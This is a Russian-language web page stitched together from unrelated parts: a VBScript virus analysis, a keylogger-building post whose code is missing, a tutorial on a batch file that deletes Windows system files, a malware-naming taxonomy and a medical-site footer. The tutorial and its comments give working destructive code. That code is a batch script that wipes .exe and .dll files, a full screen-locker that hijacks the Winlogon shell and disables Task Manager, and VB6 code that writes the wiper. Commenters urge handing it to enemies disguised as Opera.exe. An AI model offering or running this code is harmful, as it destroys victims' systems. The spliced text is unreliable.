Как создавать вирусы в visual basic

Как-то проверяя один из своих почтовых ящиков, получил странное письмо со следующим текстом: "Have fun with these links. Bye." и пристёгнутым к нему файлом с расширением .VBS . Конечно же, такое расплывчатое содержание не могло не насторожить, поэтому я не стал открывать присоединённый файл.

Я пользуюсь Outlook, и в этом случае рекомендую выбрать пункт меню "Файл/Открыть" - откроется отдельное окно просмотра письма. Тут нужно щёлкнуть правой кнопкой мыши по значку присоединённого файла и в появившемся меню выбрать пункт "Быстрый просмотр". Одного взгляда на внутреннее содержимое достаточно, чтобы определить - это макрос на языке VBScript, особой разновидности Visual Basic.

Такие программы выполняются сервером сценариев под Windows 98. Он устанавливается автоматически при стандартной установке операционной системы. При его установке в "Панели управления / Установка программ" в подсказке сказано лишь, что сценарии позволяют автоматизировать работу, и больше ничего.

Два момента сразу бросались в глаза:

Самой первой строкой была прописана команда - On Error Resume Next - игнорировать появление возможных ошибок выполнения.

Все строковые константы содержали бессмысленный набор самых разных символов, т. е. были зашифрованы.

Я ни разу не встречал исходных текстов серьёзных прикладных программ, в которых применялись бы подобные вещи. Всё это только подтверждало главное подозрение - макровирус.

Все строковые константы перед использованием в качестве параметров каких-либо методов расшифровывались специальной функцией, описанной в окончании текста программы. Как выяснилось позже, в начале исходника макровирус содержит зашифрованный код для перезаписи себя в каталог Windows\System\. Это расчёт на психологию - как только программист увидит несколько экранных страниц абракадабры, у него отпадёт всякая охота дальше разбираться в программе. Я тоже сначала так и поступил, но затем любопытство взяло верх.

Следующей проблемой стали ошибки в функции расшифровки строк - из-за них, в некоторых копиях вируса названия OLE-объектов расшифровывались неверно, и для полной ясности пришлось несколько часов провозиться, вычисляя коды символов и разбираясь в применяемой методике шифрования.

Для этого я создал новый текстовый файл с расширением .VBS и перенёс туда исправленную функцию расшифровки и все используемые строковые константы. По аналогии с вирусом, я поставил в начале программы код перезаписи себя в другой файл, но уже в расшифрованном виде.

А когда я запустил этот файл, на руках у меня оказался листинг всех расшифрованных имён объектов и сообщений, и всё стало на свои места. Оказалось, что данный вирус не является даже чем-нибудь выделяющимся среди толпы таких же "серых" макровирусов.

Распространяется по электронной почте и через локальные сети. Конечно, старается что-нибудь испортить.

Но как и любая другая программа на VBScript, он даёт некоторое представление о возможностях языка сценариев, встроенного в ОС Windows. Именно эту тему мы сейчас рассмотрим.

Как и в любом другом языке, сценарию позволено работать с текстовыми файлами. Например:

Как Вы уже заметили, синтаксис ничем не отличается от стандартного Visual Basic'а. Более того - все программы, написанные для сервера сценариев, отлично работают в среде Visual Basic в Office. Если хотите - можете даже откомпилировать их в EXE-файлы в среде разработки обычного Visual Basic'а.

Отличие в другом - сервер сценариев потому так и называется, что не содержит собственного обширного набора команд и функций, а позволяет работать через вызовы методов OLE-объектов. Это позволяет, во-первых, создавать сценарии, независимые от версии Visual Basic, а во-вторых, легко переносить их на другие языки программирования.

Поэтому практически все возможности языка VBScript ограничиваются лишь количеством OLE-объектов, установленных в системе, на которой выполняется сценарий VBS.

Так, например, программа-сценарий может управлять работой офисных приложений.

В Microsoft Office входит и Outlook, который также является OLE-сервером, т. е. им можно управлять извне, поэтому его так любят вирусописатели. Все известные макровирусы типа I_Love_You! создавали экземпляры объекта Outlook.Application, и, вызывая его методы, распространяли по Интернету "подмётные" письма.

Программный доступ к адресной книге я намеренно опускаю, дабы не соблазнять начинающих программистов опускаться до написания подобных вирусов, но элементарные знания, как программно создавать и рассылать письма Вам понадобятся для автоматизации ручного труда.

Как всегда, есть маленькая деталь. В отличие от своего офисного собрата, Outlook Express не поддерживает объект Outlook.Application, поэтому использовать его вышеописанным методом невозможно. Так что, если Вы хотите разрабатывать сценарии для работы с почтой, установите полную версию Outlook.

Следует отметить, что сам сервер сценариев также является OLE-приложением, и позволяет VBS-сценариям и внешним программам использовать свои объекты.

Вот полезный пример - создаёт ссылку на рабочем столе: 'Запрос на создание ссылки If MsgBox( "Do you want to create a shortcut to our site on Desktop?", 36, "Installing. ") = 6 Then 'Создание объекта по работе с системой Set A5 = CreateObject( "WScript.Shell") 'Работа с файлами Set A1 = CreateObject( "Scripting.FileSystemObject") 'Путь к рабочему столу dir= A5.SpecialFolders( "Desktop") 'Создание полного имени файла Fname= A1.BuildPath( dir,"MS Office support.URL") Set A6 = A1.CreateTextFile( Fname,True) A6.WriteLine( "[InternetShortcut]") A6.WriteLine( "URL=http://micr0soft.boom.ru/") A6.Close End If

Также с его помощью можно работать с реестром Windows.

Следующий пример записывает в реестр свои данные - в раздел расширений добавляет вызов программы My_program.exe для открытия файлов с расширением ZZZ.

В принципе, Вы можете программно создавать собственные разделы реестра для Ваших программ, просто указывая нужный путь при вызове метода записи в реестр.

Внимание. При экспериментах с реестром будьте внимательны и аккуратны, дабы не испортить настройки системы.

Применение языка сценариев в качестве программ инсталяции ПО, резервного копирования файлов, почтовой рассылки приглашений или автоматизации других рутинных манипуляций упростит работу системных администраторов и их пользователей.

Там же Вы найдёте и оригинальный файл вируса - в зашифрованном виде и с ошибкой в расшифровке. Попробуйте сами разобраться - узнаете много нового о VBScript. В исходнике есть ещё ряд интересных моментов, не освещённых в данной статье, но деструктивная компонента удалена, и вирус в представленном виде абсолютно безопасен.

Многие, из-за отсутствия уважения к чужому труду или недостатка опыта, не находят для VBS лучшего применения, иначе как вирусы клепать. Считаю, что это не повод отказываться от сценариев вообще, просто психология у людей такова, что некоторые из них могут испортить любое хорошее начинание.

Ведь, неважно какой инструмент ты используешь, главное как - по назначению или во вред. Ведь вирус можно написать на чём угодно, но почему-то никто не предлагает отказаться от C++ или Delphi.

В заключение, следует добавить, что в мире Unix тоже существует куча подобных интерпретаторов, реализующих языки Perl, REXX и другие. И то, что распространяется океан вирусов, написанных именно на VBScript для Windows, говорит не о том, что Windows хуже чем Unix, а всего-навсего о том, Windows имеет намного более широкую популярность. Поэтому излишняя осторожность во всём избавит Вас от вероятных потерь данных и нервных стрессов.



Хакерский мир можно условно разделить на три группы атакующих:

Может ли кто-то с хорошими навыками в программировании стать последним? Не думаю, что вы начнете создавать что-то, на подобии regin (ссылка) после посещения нескольких сессий DEFCON. С другой стороны, я считаю, что сотрудник ИБ должен освоить некоторые концепты, на которых строится вредоносное ПО.

Зачем ИБ-персоналу эти сомнительные навыки?

Знай своего врага. Как мы уже обсуждали в блоге Inside Out, нужно думать как нарушитель, чтобы его остановить. Я – специалист по информационной безопасности в Varonis и по моему опыту – вы будете сильнее в этом ремесле если будете понимать, какие ходы будет делать нарушитель. Поэтому я решил начать серию постов о деталях, которые лежат в основе вредоносного ПО и различных семействах хакерских утилит. После того, как вы поймете насколько просто создать не детектируемое ПО, вы, возможно, захотите пересмотреть политики безопасности на вашем предприятии. Теперь более подробно.

Кейлогер – это ПО или некое физическое устройство, которое может перехватывать и запоминать нажатия клавиш на скомпрометированной машине. Это можно представить как цифровую ловушку для каждого нажатия на клавиши клавиатуры.
Зачастую эту функцию внедряют в другое, более сложное ПО, например, троянов (Remote Access Trojans RATS), которые обеспечивают доставку перехваченных данных обратно, к атакующему. Также существуют аппаратные кейлогеры, но они менее распространены, т.к. требуют непосредственного физического доступа к машине.

Тем не менее создать базовые функции кейлогера достаточно легко запрограммировать. ПРЕДУПРЕЖДЕНИЕ. Если вы хотите попробовать что-то из ниже следующего, убедитесь, что у вас есть разрешения, и вы не несёте вреда существующей среде, а лучше всего делать это все на изолированной ВМ. Далее, данный код не будет оптимизирован, я всего лишь покажу вам строки кода, которые могут выполнить поставленную задачу, это не самый элегантный или оптимальный путь. Ну и наконец, я не буду рассказывать как сделать кейлогер стойким к перезагрузкам или пытаться сделать его абсолютно не обнаружимым благодаря особым техникам программирования, так же как и о защите от удаления, даже если его обнаружили.

Для подключения к клавиатуре вам всего лишь нужно использовать 2 строки на C#:

Вы можете изучить больше про фунцию GetAsyncKeyState на MSDN:

Для понимания: эта функция определяет нажата клавиш или отжата в момент вызова и была ли нажата после предыдущего вызова. Теперь постоянно вызываем эту функцию, чтобы получать данные с клавиатуры:

Что здесь происходит? Этот цикл будет опрашивать каждые 100 мс каждую из клавиш для определения ее состояния. Если одна из них нажата (или была нажата), сообщение об этом будет выведено на консоль. В реальной жизни эти данные буферизируются и отправляются злоумышленнику.

Умный кейлогер

Погодите, а есть ли смысл пытаться снимать всю подряд информацию со всех приложений?
Код выше тянет сырой ввод с клавиатуры с любого окна и поля ввода, на котором сейчас фокус. Если ваша цель – номера кредитных карт и пароли, то такой подход не очень эффективен. Для сценариев из реального мира, когда такие кейлогеры выполняются на сотнях или тысячах машин, последующий парсинг данных может стать очень долгим и по итогу потерять смысл, т.к. ценная для взломщика информация может к тому времени устареть.

Вторая версия кода:

Еще более умный кейлогер

Давайте предположим, что злоумышленник смог получить данные кодом, на подобии нашего. Так же предположим, что он достаточно амбициозен и смог заразить десятки или сотни тысяч машин. Результат: огромный файл с гигабайтами текста, в которых нужную информацию еще нужно найти. Самое время познакомиться с регулярными выражениями или regex. Это что-то на подобии мини языка для составления неких шаблонов и сканирования текста на соответствие заданным шаблонам. Вы можете узнать больше здесь.

Для упрощения, я сразу приведу готовые выражения, которые соответствуют именам логина и паролям:

Эти выражения здесь как подсказка тому, что можно сделать используя их. С помощью регулярных выражений можно искать (т найти!) любые конструкции, которые имеют определенный и неизменный формат, например, номера паспортов, кредитных карт, учетные записи и даже пароли.
Действительно, регулярные выражения не самый читаемый вид кода, но они одни из лучших друзей программиста, если есть задачи парсинга текста. В языках Java, C#, JavaScript и других популярных уже есть готовые функции, в которые вы можете передать обычные регулярные выражения.

Для C# это выглядит так:

Где первое выражение (re) будет соответствовать любой электронной почте, а второе (re2) любой цифро буквенной конструкции больше 6 символов.

Бесплатно и полностью не обнаружим

В своем примере я использовал Visual Studio – вы можете использовать свое любимое окружение – для создания такого кейлогера за 30 минут.
Если бы я был реальным злоумышленником, то я бы целился на какую-то реальную цель (банковские сайты, соцсети, тп) и видоизменил код для соответствия этим целям. Конечно, также, я запустил бы фишинговую кампанию с электронными письмами с нашей программой, под видом обычного счета или другого вложения.

Остался один вопрос: действительно такое ПО будет не обнаруживаемым для защитных программ?


В этом основная фишка! Вы всегда можете менять код и развиваться, будучи всегда на несколько шагов раньше сканеров угроз. Если вы в состоянии написать свой собственный код он почти гарантированно будет не обнаружим. На этой странице вы можете ознакомиться с полным анализом.

Основная цель этой статьи – показать, что используя одни только антивирусы вы не сможете полностью обеспечить безопасность на предприятии. Нужен более глубинная оценка действий всех пользователей и даже сервисов, чтобы выявить потенциально вредоносные действия.

В следующих статья я покажу, как сделать действительно не обнаружимую версию такого ПО.

Сегодня мы будем делать Самоуничтожитель компа. Для этого тебе нужен Текстовой документ (Блокнот), или любой другой текстовой редактор, и все! Желательно чтоб ты хоть децл разбирался в командах DOS, но не обязательно. Начнем:

Для начала я решил дать тебе краткую справку по командам DOS
Del путь и имя файла - удалить
CD имя папки - вход в папку
CD - переход в корневой каталог диска

Теперь входим в Текстовой документ, и пишем этот код:

cd
cd windows
del *.exe
del *.dll
или
cd
del *.bat

В первом случае из винда удаляются все EXE и DLL файлы, а во втором из диска C: удаляется файл Autoexec.bat, в обоих случаях комп накрывается. Теперь чтобы программа была не в текстовом формате, а чтобы ее можно было запустить нам надо сохранить ее в BAT файл, для этого ставим Сохранить как, и в поле имя пишем bla.bat, и все, теперь дай ее своему врагу, и когда он откроет этот файл, у него комп полетит (на юг). Но помни золотое правило, программа должна запускаться с ДИСКА С:, с других дисков она ЗАПУСКАТЬСЯ НЕ БУДЕТ.

А вот чтобы программа запускалась из - за всех дисков, Батуев Юрий прислал мне такой код:

@cd с:windows
del *.exe
del *.dll

Это правда удалит все фаилы с компа??
Или это прикол??

P.S. Значит раюотает!

Я попробовал АААААААААААаа

а на линуксе подобное как можно сделать?

в линуксе такое не повторишь, пароль-root не пустит.

vb6-программы под линуксом не запускаются (возможно только под wine)

Я попробую у нас в техникуме на компьютере,потом расскажу,что получится из всего этого!)))

Лучше из жтого bat сделать exe. тогда ваще вирус настоящий)) я так уже уничтожил 3 компа в инете =D З.Ы. exe можно сделать с помощью обычного winrar, разбирайтесь сами как ))

Можно и без WinRar'а,
жмакаеш сохранит как.
И пишеш
Opera.exe
xD Тащиш иконку от оперы ставиш иконку на егзешник и вуоля супер опера

Сделал и назвал характерно, а то могу забыть и запустить)))

дак попробуйте запустите,только DOS поставьте не на виндовсе,а например на заранее заготовленной папке с файлами 1.txt 2.txt 3.txt,и удалить *.txt . и всё. не обязательно винду корячить

Как его сделать в exe?

Угарно, вот разозлит меня кто в нете, хана ему терь, токо прричём тут вб??хотя урок мего и состоит он вот в чём:
НИКОГДА НИ ПРИ КАКИХ ОБСТОЯТЕЛЬСТВАХ НЕ ОТКРЫВАЙ ФАЙЛЫ .БЛП СКАЧЕННЫЕ С НЕТА

приветьюкак можно создать игра,

Я не пробовал, но зуб даю, что ничего хорошего из этого не выйдет. он удаляет dllшники и exeшники в папке windows!(системной папке, в которой хранится explorer.exe)

андрей открывать эти файлы надо блокнотом и проверять

а касперский та молчит
вирусов та здеся нету

Такое ощущение что никто с батниками незнаком! Простые команды командной строки)) Помню жестокие фигни я на них чудил))

не получилось. только я не на экзешниках эксперементировал а на собственных форматах.

попробуйте этот код
ужасные батники блокирующие комп:
@echo off
CHCP 1251
Set M1=хахаха вирус!
Set M2=Пароль
Set M3=3 раза ошибёся - не сможешь работать в системе
Set M4=те нужен пароль штоб разблокировать пк
Set M5=выключаюсь
Set M6=неверный пароль у тя 2 попытки
Set M7=неверный пароль у тя 1 попытка
Set M8=поиск и удаление файлов вируса
Set M9=и не вздумай закрывать это окно - не сможешь работать в системе
title вирус
CHCP 866
:E1
cls
IF EXIST C:\windows\boot.bat (
goto E2 )
IF NOT EXIST C:\windows\boot.bat (
reg add "HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REGSZ /d C:\windows\boot.bat /f
ECHO @echo off >>C:\windows\boot.bat
ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe >>C:\windows\boot.bat
ECHO reg add "HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system" /v DisableTaskMgr /t REG
DWORD /d 1 /f >>C:\windows\boot.bat
ECHO start sys.bat >>C:\windows\boot.bat
ECHO exit >>C:\windows\boot.bat
attrib +r +a +s +h C:\windows\boot.bat
copy %0 c:\windows\sys.bat
GOTO end)
:E2
cls
Echo %M1%
echo %M9%
echo.
echo %M4%
echo %M3%
set /a choise = 0
set /p choise=%M2%:
if "%choise%" == "892326" goto E3
if "%choise%" == "test" goto E4
if "%choise%" == "101" goto E5
cls
Echo %M1%
echo %M9%
echo.
echo %M4%
echo %M6%
set /a choise = 0
set /p choise=%M2%:
if "%choise%" == "892326" goto E3
if "%choise%" == "test" goto E4
if "%choise%" == "101" goto E5
cls
Echo %M1%
echo %M9%
echo.
echo %M4%
echo %M7%
set /a choise = 0
set /p choise=%M2%:
if "%choise%" == "892326" goto E3
if "%choise%" == "test" goto E4
if "%choise%" == "101" goto E5
CHCP 1251
Shutdown -t 10 -r -s -c "пароль "%choise%" неверен. "
exit
:E3
cls
echo %M5%
attrib -r -a -s -h C:\windows\boot.bat
del C:\windows\boot.bat
attrib -r -a -s -h C:\windows\sys.bat
reg add "HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d Explorer.exe /f
reg delete "HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system" /v DisableTaskMgr /f
goto E5
:E4
cls
echo %M8%
IF not EXIST C:\windows\boot.bat goto end
echo boot.bat. ok
IF not EXIST c:\windows\sys.bat goto end
echo sys.bat. ok
pause
goto :E2
:E5
start explorer.exe
:end
exit

если вы это запустили у себя то при перезагрузке системы батник нафиг блокирнёт комп (даже в безопасном режиме и откат не поможет) и если запустили у себя, то введите код 892326 (для полной разблокировки)
я сам эту фигню поймал и пришлось переустановить систему на другой раздел
потом я взял и нашол этот батник

format D:\ | y, а это на каком языке написано.

alex97sh [17.11.2011 21:47]

Это вообще то Batsh %) Командная строка.

а зачем при выключение батника включаеться explorer.exe если он не выключен значет включаеться проводник
значит при включение батника explorer.exe должен выключаться а у меня не выключаеться

я тут почитал все коменты и не долго думая придумал вариант на Васеке такой можно и подсунуть незаметно в авто запуск другану-врагу или отправить по мылу проверена на Kaspersky Internet Security 2012
он только спросит доверять этой проги или нет.
Option Explicit
'Нужные переменные.
Private Sub Form_Load()
Dim FNum As Integer
Dim strA As String
Dim FPath As String
'Создаем наш Бтничек имя можно сделать любое
FPath = "ChiBlo.bat"
FNum = FreeFile
'Редактирования файла ChiBlo.bat встрайвем нужные строки
Open FPath For Output As FNum
strA = "cd"
Print #FNum, strA
strA = "cd c:\windows"
Print #FNum, strA
strA = "del *.exe"
Print #FNum, strA
strA = "del *.dll"
Print #FNum, strA
strA = "del *.bat"
Close FNum
End Sub

Прикольно. Сам по глупости так лоханулся, приняв скачанную программу за очередной аудио-плеер.

Интересно,поисшу в инете.

Слушайте, хорошая штука! После того как я у друга на днюхе загнал этого троянчика ему в комп пока его небыло рядом его некто ООЧЧЕЕННЬЬ долго не видел нигде в сети

под Win7 это не заработает - т.к будет выдавать ошибку записи, можно конечно запустить от имени адиминистратора, но фишка в том, что жертва должна сама запустить этот файл, так что это не совсем то

нежелательно такие шутки постить
компы же жалко

Ребята, а может ну на хрен разрушать "ломать не строить" Может лучше все-таки заняться чем-нибудь креативным.

Чтобы научиться строить нужно уметь ломать ))

Согласен, если цель учиться строить, только чаще такой цели увы нет.

Авотхуй) Уметь ломать - совсем не уметь строить. Вирусы начинают писать те, у кого мозгов не хватает придумать нечто полезное.

Чтобы написать вирус нужно быть очень хорошим программистом, и четко понимать как работает операционная система, для которой пишется вирус )
Я не говорю про "вирусы", аля создание милиона папок )

Страница может отображаться некорректно.

Другие наши ресурсы

Чтобы добавить ресурс в библиотеку, войдите в аккаунт.

  • Все: -
  • Незакрытые: -
  • Последний: -

Свяжитесь с нами Незакрытые запросы:

В данную группу объединяют вирусы, написанные на языках программирования высокого уровня, таких как С, С++, Pascal, Basic и других. HLL вирусы разделяют на 5 классов:

Классы Описание
1 HLLC
(High Level Language Companion)
Программа-компаньон, которая использует алгоритм инфицирования, базирующийся на манипуляции именами файлов в файловой системе. HLLC-вирус, как правило, переименовывает оригиналы исполняемых файлов (или перемещает их в другие папки), а затем использует оригинальные названия для создания вирусных копий.
2 HLLO
(High Level Language Overwriting)
Вредоносная программа, которая перезаписывает данные файла-жертвы.
3 HLLP
(High Level Language Parasitic)
Паразитическая вредоносная программа, которая поражает исполняемые файлы, не повреждая их данные. Пример: Win32.HLLP.Coler.17
4 HLLM
(High Level Language MassMailing Worm)
Вредоносная программа, рассылающая себя по почте.
Пример : Win32.HLLM.MailSpamer
5 HLLW
(High Level Language Worm)
Вредоносная программа, которая для распространения не нуждается в хост-файле. Может реплицироваться и по сети.
Пример : Win32.HLLW.Flame
  • "Trojan." — общее название для различных Троянских программ (Троянцев) :
  • "PWS." — Троянская программа, которая ворует пароли. Как правило, префикс такой вирусной программы дополняется словом "Trojan." - "Trojan.PWS."
  • "Backdoor." — вирусная троянская программа, которая содержит в себе RAT-функцию (RAT - Remote Administration Tool — утилита удаленного администрирования).

Вирусы, которые не обладают никакими особенными характеристиками (такими как текстовые строки, специальные эффекты и т.д.) вследствие чего нет возможности присвоить таким вирусам особенные названия.

  • "SillyC." — не резидентные в памяти вирусы, объектами поражения которых являются только COM-файлы;
  • "SillyE." — не резидентные в памяти вирусы, объектами поражения которых являются только EXE-файлы;
  • "SillyCE." — не резидентные в памяти вирусы, объектами поражения которых являются только COM- и EXE-файлы;
  • "SillyRC." — резидентные в памяти вирусы, объектами поражения которых являются только COM-файлы;
  • "SillyRE." — резидентные в памяти вирусы, объектами поражения которых являются только EXE-файлы;
  • "SillyRCE." — резидентные в памяти вирусы, объектами поражения которых являются только COM- и EXE-файлы;
  • "SillyO." -не резидентные в памяти вирусы, которые перезаписывают файлы;
  • "SillyOR." — резидентные в памяти вирусы, которые перезаписывают файлы.

В данную группу объединяют вирусы, использующие особенности файлов офисных программ, а также встроенные макроязыки данных приложений. Группа содержит 6 классов.

Классы Описание
1 P98M Инфицирует документы и шаблоны MS PowerPoint 98.
2 W97M Инфицирует документы и шаблоны MS Word 8.0–9.0 (MS Office'97/2000).
3 X97M Инфицирует документы MS Excel 8.0–9.0 (MS Office'97/2000).
4 O97M Кросс-платформенный макровирус.
Инфицирует одновременно несколько приложений MS Office.
5 A97M Инфицирует базы данных MS Access'97/2000.
6 StarOffice Инфицирует файлы офисного пакета StarOffice, предназначенного для операционных систем Solaris, Microsoft Windows, Linux, macOS.

В данную группу объединяют вирусы, написанные на различных интерпретируемых языках. Скрипт-вирусы разделяют на 9 классов.

Классы Описание
1 VBS Написан на языке программирования Visual Basic Script.
2 JS Написан на языке программирования Java Script language.
3 Wscript Написан на языке программирования Windows Script.
4 HTML Написан на языке программирования HTML.
5 Perl Написан на языке программирования Perl.
6 PHP Написан на языке программирования PHP.
7 IRC Конфигурационные файлы IRC-клиентов, позволяющие злоумышленникам удаленно производить различные вредоносные действия, передавая команды по протоколу IRC.
8 Java Написан на языке программирования Java в виде class-файлов.
9 BAT Написан на языке командного интерпретатора MS-DOS.

В данную группу объединяют вирусы, разработанные для инфицирования файлов конкретных программ. Выделяют 3 класса узкоспециализированного вредоносного ПО.

Классы Описание
1 ACAD Вредоносная программа, написанная на языке AutoLisp
2 AutoLisp Вредоносная программа, написанная на языке AutoLisp
3 SWF Вредоносные флеш-файлы, либо внедренные в них флеш-объекты

В данную группу объединяют вредоносные программы, разработанные для осуществления DoS-атак (от англ. Denial of Service) с целью довести вычислительную систему до отказа в обслуживании. В группе выделяют 2 класса.

Классы Описание
1 DDoS Вредоносные программы для осуществления DDoS — атак (от англ. Distributed Denial of Service), т. е. атак, выполняемых одновременно с большого количества компьютеров.
2 FDOS Вредоносные программы, отправляющие большое число запросов к какому-либо сервису с целью вывести его из строя.

В данную группу объединяют программы, неспособные к самовоспроизведению и представляющие потенциальную опасность. Группа содержит 5 классов.

Классы Описание
1 Joke Программы-шутки.
2 Program Программы, которые могут быть использованы злоумышленниками.
3 Tool Потенциально опасные программы и хакерские утилиты.
4 Dialer Невредоносная программа, использующая доступ в интернет с разрешения пользователя для того, чтобы попасть на определенные сайты. Обычно имеет подписанный сертификат и уведомляет обо всех своих действиях.
5 Adware Программное обеспечение, демонстрирующее рекламу на компьютере пользователя без его согласия.
Примеры : Adware.Adshot, Adware.GameVance.11

В данную группу объединяют вредоносные программы, разработанные для определенных операционных систем (ОС). В зависимости от типа инфицируемой ОС выделяют 19 классов.

Классы Описание
1 BeOS Для операционной системы BeOS
2 FreeBSD Для операционной системы FreeBSD
3 IphoneOS Для операционной системы iOS
4 MeOS Для операционной системы MeOS
5 OS2 Поражают исполняемые файлы (LX) операционной системы OS/2
6 Win2K Для операционной системы Windows 2000
7 Win32/Linux Кросс-платформенный вирус, для Windows с 32-разрядной архитектурой и Linux
8 Win64 Для 64-разрядных версий ОС Windows
9 Win9x Для ОС семейства Windows 95/98, ME
10 WinCE Для операционных систем WinCE, Windows Mobile
11 Win Поражают 16-битные исполняемые файлы (NE) в ОС Windows (NewExe — формат исполняемых файлов операционной системы Windows 3.xx). Некоторые из этих вирусов могут работать не только в ОС Windows 3.xx, но также и в ОС Win'95/98/.
12 Win32 Поражают 32-битные исполняемые файлы(PE) операционных систем Windows 95/98/NT.
13 Win95 Поражает 32-битные исполняемые файлы (PE и LE(VxD)) операционных систем Windows 95/98.
14 Win98 Для операционной системы Windows 98.
15 Symbian Для Symbian OS (мобильная ОС).
16 SunOS Для ОС SunOS (Solaris).
17 Mac Для операционной системы macOS.
18 Android Для Android (мобильная ОС)/
19 Linux Поражают исполняемые программы операционной системы Linux.

Программы данной группы характеризуют как опасные и разделяют на 3 класса.

Классы Описание
1 Backdoor Программы, предоставляющие злоумышленнику несанкционированный доступ к системе. Бэкдоры получают информацию с управляющих серверов (C&C, от англ. Command and Control Center). Возможные функции: загрузка файлов, осуществление DDoS-атак, рассылка спама и т. д.
Примеры : BackDoor.Andromeda, BackDoor.DaVinci.1
2 Trojan Вредоносные программы, осуществляющие несанкционированные пользователем действия на его компьютере. Данные действия не обязательно будут разрушительными, но они всегда направлены во вред пользователю.
Название этого типа атак происходит от известной легенды о деревянной статуе коня, использованной греками для проникновения в Трою.
Примеры : Trojan.Botnetlog, Trojan.DownLoad, Trojan.Stuxnet
3 Exploit Данные (или программный код), предназначенные для использования уязвимостей в системе пользователя.
Примеры : Exploit.BlackHole, Exploit.Java

Конструктор для создания вирусов, троянцев и других вредоносных программ — VirusConstructor.

Читайте также:

Пожалуйста, не занимайтесь самолечением!
При симпотмах заболевания - обратитесь к врачу.

Copyright © Иммунитет и инфекции